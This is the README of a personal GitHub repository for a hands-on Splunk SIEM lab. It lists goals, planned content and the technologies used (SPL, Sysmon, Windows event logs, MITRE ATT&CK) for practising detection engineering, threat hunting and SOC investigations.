Jrodri5891/Splunk-Detection-Lab

# Splunk-Detection-Lab Hands-on Splunk SIEM lab focused on detection engineering, threat hunting, SOC investigations, and real-world security monitoring using SPL queries and MITRE ATT&CK mapping. # Overview This repository contains practical Splunk projects, detections, dashboards, reports, threat hunting exercises, and security analysis scenarios designed to strengthen blue-team and SIEM skills. The goal of this repository is to: * Practice Splunk SPL and log analysis * Build detection engineering workflows * Simulate SOC investigations * Develop threat hunting methodologies * Improve SIEM monitoring and alerting skills * Document hands-on cybersecurity projects and labs * Map detections to the MITRE ATT&CK framework This repository is part of my continued learning in: * Splunk * Detection Engineering * Threat Hunting * SOC Operations * DFIR (Digital Forensics & Incident Response) # Repository Content Projects and content may include: * SPL Queries * Detection Rules * Threat Hunting Exercises * SOC Investigation Reports * Dashboard Development * Alert Creation * Windows Event Log Analysis * Sysmon Analysis * IOC Hunting * MITRE ATT&CK Mapping * Security Visualizations * Incident Response Scenarios # Technologies Used * Splunk Enterprise * SPL (Search Processing Language) * Windows Event Logs * Sysmon * MITRE ATT&CK Framework * Wireshark * DFIR Methodologies * Blue-Team Detection Techniques # Current Status This repository is actively being expanded with new projects, detections, dashboards, reports, and security investigations as I continue developing hands-on SIEM and detection engineering skills.